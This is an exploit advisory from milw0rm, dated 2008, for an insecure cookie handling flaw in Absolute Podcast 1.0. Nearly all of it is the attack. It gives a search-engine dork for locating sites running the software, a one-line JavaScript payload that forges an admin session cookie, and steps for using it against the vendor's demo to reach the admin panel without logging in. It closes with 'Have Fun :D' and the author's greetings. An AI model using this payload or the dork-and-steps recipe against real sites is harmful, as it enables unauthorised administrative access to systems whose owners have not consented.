Absolute Podcast 1.0 Remote Insecure Cookie Handling Vulnerability.pdf

1 ############################################################################################### 2 _____ ____ __ ___ ______ ______ | ____ _____ _____ 3 | / ___| \ \ / / / ____| / | | | | _ \ | 4 |_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ 5 | | |_ || | | | |____ | | | | | | _ | | 6 |_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| 7 8 # Discovered By : Hakxer 9 # Home : Www.educ−up.com 10 # Type Gap : Insecure cookie handling 11 # script : Absloute Podcast V 1.0 [see script] http://www.xigla.com/apodcasting/demo.htm 12 # Greetz : Allah , Egyptian x Hacker , all my team , All educ−up member 13 # Team : EgY Coders 14 ################################################################################################# 15 16 # Dork : "Powered by Absolute Podcast " 17 18 # Poc 19 ==> javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s="; 20 21 # Live Script 22 23 # First go to Admin panel : http://www.xigla.com/apodcasting/demo/login.aspx 24 # [~] javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s="; 25 # Second Go to http://www.xigla.com/apodcasting/demo/menu.aspx 26 # See Admin panel .. 27 28 # Have Fun :D 29 30 ############################################################################### 31 32 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− The End of Gap −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 33 34 ## Contact : aq5@windowslive.com 35 ### Muslim Hacker .. I love you Mohammed Rasull Allah 36 ###################################################### 37 38 # milw0rm.com [2008−10−30] Page 1/1 Absolute Podcast 1.0 Remote Insecure Cookie Handling Vulnerability Hakxer 10/30/2008